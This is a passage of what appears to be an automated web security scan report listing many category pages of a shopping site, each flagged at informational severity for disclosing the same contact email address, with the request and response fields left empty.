5.18. http://secureshopping.mcafee.com/browse/baby/apparel/shirts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/shirts/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.19. http://secureshopping.mcafee.com/browse/baby/apparel/sweaters/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/sweaters/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.20. http://secureshopping.mcafee.com/browse/baby/apparel/swimwear/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/swimwear/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.21. http://secureshopping.mcafee.com/browse/baby/bathing/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.22. http://secureshopping.mcafee.com/browse/baby/bathing/bath-tubs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/bath-tubs/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.23. http://secureshopping.mcafee.com/browse/baby/bathing/hooded-towels/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/hooded-towels/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.24. http://secureshopping.mcafee.com/browse/baby/bathing/lotion/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/lotion/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.25. http://secureshopping.mcafee.com/browse/baby/bathing/potty-training/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/potty-training/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.26. http://secureshopping.mcafee.com/browse/baby/bathing/powder/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/powder/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.27. http://secureshopping.mcafee.com/browse/baby/bathing/shampoo/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/shampoo/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.28. http://secureshopping.mcafee.com/browse/baby/bathing/soap/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/soap/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.29. http://secureshopping.mcafee.com/browse/baby/bathing/washcloths/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/washcloths/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.30. http://secureshopping.mcafee.com/browse/baby/bedding/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.31. http://secureshopping.mcafee.com/browse/baby/bedding/bedskirts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/bedskirts/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.32. http://secureshopping.mcafee.com/browse/baby/bedding/blankets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/blankets/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.33. http://secureshopping.mcafee.com/browse/baby/bedding/bumper-pads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/bumper-pads/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.34. http://secureshopping.mcafee.com/browse/baby/bedding/comforters/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/comforters/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.35. http://secureshopping.mcafee.com/browse/baby/bedding/crib-sets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/crib-sets/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.36. http://secureshopping.mcafee.com/browse/baby/bedding/hooded-towels/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/hooded-towels/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.37. http://secureshopping.mcafee.com/browse/baby/bedding/mattress-pads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/mattress-pads/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.38. http://secureshopping.mcafee.com/browse/baby/bedding/sheets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/sheets/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.39. http://secureshopping.mcafee.com/browse/baby/bedding/washcloths/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/washcloths/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.40. http://secureshopping.mcafee.com/browse/baby/diapering/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/diapering/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.41. http://secureshopping.mcafee.com/browse/baby/diapering/baby-wipes/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/diapering/baby-wipes/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.42. http://secureshopping.mcafee.com/browse/baby/diapering/diaper-bags/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/diapering/diaper-bags/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.43. http://secureshopping.mcafee.com/browse/baby/diapering/diaper-covers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/diapering/diaper-covers/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.44. http://secureshopping.mcafee.com/browse/baby/diapering/diaper-storage-disposal/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/diapering/diaper-storage-disposal/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.45. http://secureshopping.mcafee.com/browse/baby/diapering/diapers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/diapering/diapers/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.46. http://secureshopping.mcafee.com/browse/baby/diapering/skin-care/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/diapering/skin-care/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.47. http://secureshopping.mcafee.com/browse/baby/feeding/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.48. http://secureshopping.mcafee.com/browse/baby/feeding/baby-food-grinders/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/baby-food-grinders/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.49. http://secureshopping.mcafee.com/browse/baby/feeding/baby-food/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/baby-food/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.50. http://secureshopping.mcafee.com/browse/baby/feeding/bibs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/bibs/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.51. http://secureshopping.mcafee.com/browse/baby/feeding/bottles/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/bottles/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.52. http://secureshopping.mcafee.com/browse/baby/feeding/breast-pumps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/breast-pumps/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.53. http://secureshopping.mcafee.com/browse/baby/feeding/formula/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/formula/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.54. http://secureshopping.mcafee.com/browse/baby/feeding/milk-storage-bags/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/milk-storage-bags/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.55. http://secureshopping.mcafee.com/browse/baby/feeding/nipples/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/nipples/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.56. http://secureshopping.mcafee.com/browse/baby/feeding/nursing-apparel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/nursing-apparel/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.57. http://secureshopping.mcafee.com/browse/baby/feeding/nursing-bras/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/nursing-bras/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.58. http://secureshopping.mcafee.com/browse/baby/feeding/nursing-pads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/nursing-pads/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.59. http://secureshopping.mcafee.com/browse/baby/feeding/nursing-pillows/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/nursing-pillows/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.60. http://secureshopping.mcafee.com/browse/baby/feeding/spoons-forks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/spoons-forks/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.61. http://secureshopping.mcafee.com/browse/baby/furniture/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.62. http://secureshopping.mcafee.com/browse/baby/furniture/bassinets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/bassinets/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.63. http://secureshopping.mcafee.com/browse/baby/furniture/changing-tables/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/changing-tables/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.64. http://secureshopping.mcafee.com/browse/baby/furniture/cribs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/cribs/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.65. http://secureshopping.mcafee.com/browse/baby/furniture/dressers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/dressers/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.66. http://secureshopping.mcafee.com/browse/baby/furniture/gliders-walkers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/gliders-walkers/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.67. http://secureshopping.mcafee.com/browse/baby/furniture/high-chairs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/high-chairs/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.68. http://secureshopping.mcafee.com/browse/baby/furniture/lamps-shades/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/lamps-shades/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.69. http://secureshopping.mcafee.com/browse/baby/furniture/mobiles/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/mobiles/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.70. http://secureshopping.mcafee.com/browse/baby/furniture/moses-baskets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/moses-baskets/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.71. http://secureshopping.mcafee.com/browse/baby/furniture/night-lights/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/night-lights/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.72. http://secureshopping.mcafee.com/browse/baby/furniture/play-pens/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/play-pens/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.73. http://secureshopping.mcafee.com/browse/baby/furniture/rocking-chairs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/rocking-chairs/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.74. http://secureshopping.mcafee.com/browse/baby/furniture/swings-bouncers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/swings-bouncers/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.75. http://secureshopping.mcafee.com/browse/baby/furniture/toddler-bed/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/toddler-bed/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.76. http://secureshopping.mcafee.com/browse/baby/furniture/toy-chests/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/toy-chests/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.77. http://secureshopping.mcafee.com/browse/baby/health/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.78. http://secureshopping.mcafee.com/browse/baby/health/brushes-combs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/brushes-combs/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.79. http://secureshopping.mcafee.com/browse/baby/health/diaper-rash-ointment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/diaper-rash-ointment/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.80. http://secureshopping.mcafee.com/browse/baby/health/pacifiers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/pacifiers/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.81. http://secureshopping.mcafee.com/browse/baby/health/teethers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/teethers/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.82. http://secureshopping.mcafee.com/browse/baby/health/teething-relief/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/teething-relief/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.83. http://secureshopping.mcafee.com/browse/baby/health/thermometers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/thermometers/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.84. http://secureshopping.mcafee.com/browse/baby/health/toilet-training/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/toilet-training/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.85. http://secureshopping.mcafee.com/browse/baby/safety/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.86. http://secureshopping.mcafee.com/browse/baby/safety/baby-monitors/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/baby-monitors/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.87. http://secureshopping.mcafee.com/browse/baby/safety/bath-safety/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/bath-safety/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.88. http://secureshopping.mcafee.com/browse/baby/safety/door-knob-covers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/door-knob-covers/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.89. http://secureshopping.mcafee.com/browse/baby/safety/drawer-cabinet-locks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/drawer-cabinet-locks/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.90. http://secureshopping.mcafee.com/browse/baby/safety/night-lights/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/night-lights/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.91. http://secureshopping.mcafee.com/browse/baby/safety/outlet-covers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/outlet-covers/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.92. http://secureshopping.mcafee.com/browse/baby/safety/safety-gates/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/safety-gates/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.93. http://secureshopping.mcafee.com/browse/baby/safety/safety-kits/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/safety-kits/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.94. http://secureshopping.mcafee.com/browse/baby/toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.95. http://secureshopping.mcafee.com/browse/baby/toys/activity-toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/activity-toys/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.96. http://secureshopping.mcafee.com/browse/baby/toys/bath-toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/bath-toys/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.97. http://secureshopping.mcafee.com/browse/baby/toys/learning-toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/learning-toys/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.98. http://secureshopping.mcafee.com/browse/baby/toys/mobiles/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/mobiles/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.99. http://secureshopping.mcafee.com/browse/baby/toys/music-toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/music-toys/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.100. http://secureshopping.mcafee.com/browse/baby/toys/play-gyms-mats/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/play-gyms-mats/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.101. http://secureshopping.mcafee.com/browse/baby/toys/pull-along-toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/pull-along-toys/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.102. http://secureshopping.mcafee.com/browse/baby/toys/rattles/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/rattles/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.103. http://secureshopping.mcafee.com/browse/baby/toys/stuffed-toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/stuffed-toys/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.104. http://secureshopping.mcafee.com/browse/baby/travel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/travel/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.105. http://secureshopping.mcafee.com/browse/baby/travel/baby-carriers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/travel/baby-carriers/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.106. http://secureshopping.mcafee.com/browse/baby/travel/car-seats/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/travel/car-seats/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.107. http://secureshopping.mcafee.com/browse/baby/travel/strollers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/travel/strollers/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.108. http://secureshopping.mcafee.com/browse/clothing-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/clothing-accessories/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.109. http://secureshopping.mcafee.com/browse/clothing-accessories/jewelry-watches/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/clothing-accessories/jewelry-watches/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.110. http://secureshopping.mcafee.com/browse/collectibles-art/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/collectibles-art/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.111. http://secureshopping.mcafee.com/browse/computers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.112. http://secureshopping.mcafee.com/browse/computers/accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.113. http://secureshopping.mcafee.com/browse/computers/accessories/audio-video-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/audio-video-accessories/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.114. http://secureshopping.mcafee.com/browse/computers/accessories/bags,-cases-covers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/bags,-cases-covers/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.115. http://secureshopping.mcafee.com/browse/computers/accessories/batteries-chargers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/batteries-chargers/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.116. http://secureshopping.mcafee.com/browse/computers/accessories/camcorder-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/camcorder-accessories/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.117. http://secureshopping.mcafee.com/browse/computers/accessories/camera-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/camera-accessories/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.118. http://secureshopping.mcafee.com/browse/computers/accessories/camera-lenses/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/camera-lenses/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.119. http://secureshopping.mcafee.com/browse/computers/accessories/cell-phone-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/cell-phone-accessories/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.120. http://secureshopping.mcafee.com/browse/computers/accessories/desktop-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/desktop-accessories/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.121. http://secureshopping.mcafee.com/browse/computers/accessories/gps-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/gps-accessories/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.122. http://secureshopping.mcafee.com/browse/computers/accessories/headphones/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/headphones/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.123. http://secureshopping.mcafee.com/browse/computers/accessories/microphones/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/microphones/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.124. http://secureshopping.mcafee.com/browse/computers/accessories/monitor-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/monitor-accessories/

Issue detail

The following email address was disclosed in the response:

